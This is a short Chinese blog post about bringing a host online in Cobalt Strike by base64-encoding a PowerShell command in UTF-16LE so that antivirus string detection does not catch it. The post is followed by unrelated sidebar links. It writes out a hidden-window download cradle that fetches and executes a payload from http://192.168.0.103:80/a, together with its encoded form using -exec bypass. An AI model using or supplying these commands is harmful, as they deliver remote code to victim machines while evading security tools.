当前位置:网站首页>powershell cs-UTF-16LE编码上线
powershell cs-UTF-16LE编码上线
2022-07-07 09:59:00 【kuxing_admin】
0x01前言
当我们要上线主机的时候,可能会因为你的代码含有木马字符串,导致无法上线
0x02问题
1、 例子
powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=
2、原句子powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.103:80/a'))"
3、UTF-16LE编码后 (在powershell上能直接执行)
powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMAAuADEAMAAzADoAOAAwAC8AYQAnACkAKQA=
主机上线
边栏推荐
- VIM command mode and input mode switching
- Unsupervised learning of visual features by contracting cluster assignments
- Visual Studio 2019 (LocalDB)\MSSQLLocalDB SQL Server 2014 数据库版本为852无法打开,此服务器支持782版及更低版本
- Use references
- Some opinions and code implementation of Siou loss: more powerful learning for bounding box regression zhora gevorgyan
- Electron adding SQLite database
- 竟然有一半的人不知道 for 与 foreach 的区别???
- [Yugong series] go teaching course 005 variables in July 2022
- 《通信软件开发与应用》课程结业报告
- [shortest circuit] acwing1128 Messenger: Floyd shortest circuit
猜你喜欢
OneDNS助力高校行业网络安全
Flet教程之 15 GridView 基础入门(教程含源码)
《通信软件开发与应用》课程结业报告
Flet教程之 14 ListTile 基础入门(教程含源码)
. Net Maui performance improvement
In SQL, I want to set foreign keys. Why is this problem
聊聊SOC启动(十) 内核启动先导知识
Zhou Yajin, a top safety scholar of Zhejiang University, is a curiosity driven activist
Swiftui tutorial how to realize automatic scrolling function in 2 seconds
Improve application security through nonce field of play integrity API
随机推荐
[system design] index monitoring and alarm system
Briefly introduce closures and some application scenarios
The road to success in R & D efficiency of 1000 person Internet companies
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
STM32 entry development NEC infrared protocol decoding (ultra low cost wireless transmission scheme)
Complete collection of common error handling in MySQL installation
The Oracle message permission under the local Navicat connection liunx is insufficient
VIM command mode and input mode switching
What is cloud computing?
【系统设计】指标监控和告警系统
超标量处理器设计 姚永斌 第10章 指令提交 摘录
STM32入门开发 编写DS18B20温度传感器驱动(读取环境温度、支持级联)
18 basic introduction to divider separator component of fleet tutorial (tutorial includes source code)
Tsinghua Yaoban programmers, online marriage was scolded?
R語言使用magick包的image_mosaic函數和image_flatten函數把多張圖片堆疊在一起形成堆疊組合圖像(Stack layers on top of each other)
In my limited software testing experience, a full-time summary of automation testing experience
sink 消费 到 MySQL, 数据库表里面已经设置了 自增主键, flink 里面,如何 操作?
QT | multiple windows share a prompt box class
聊聊SOC启动(十一) 内核初始化
R language Visual facet chart, hypothesis test, multivariable grouping t-test, visual multivariable grouping faceting boxplot, and add significance levels and jitter points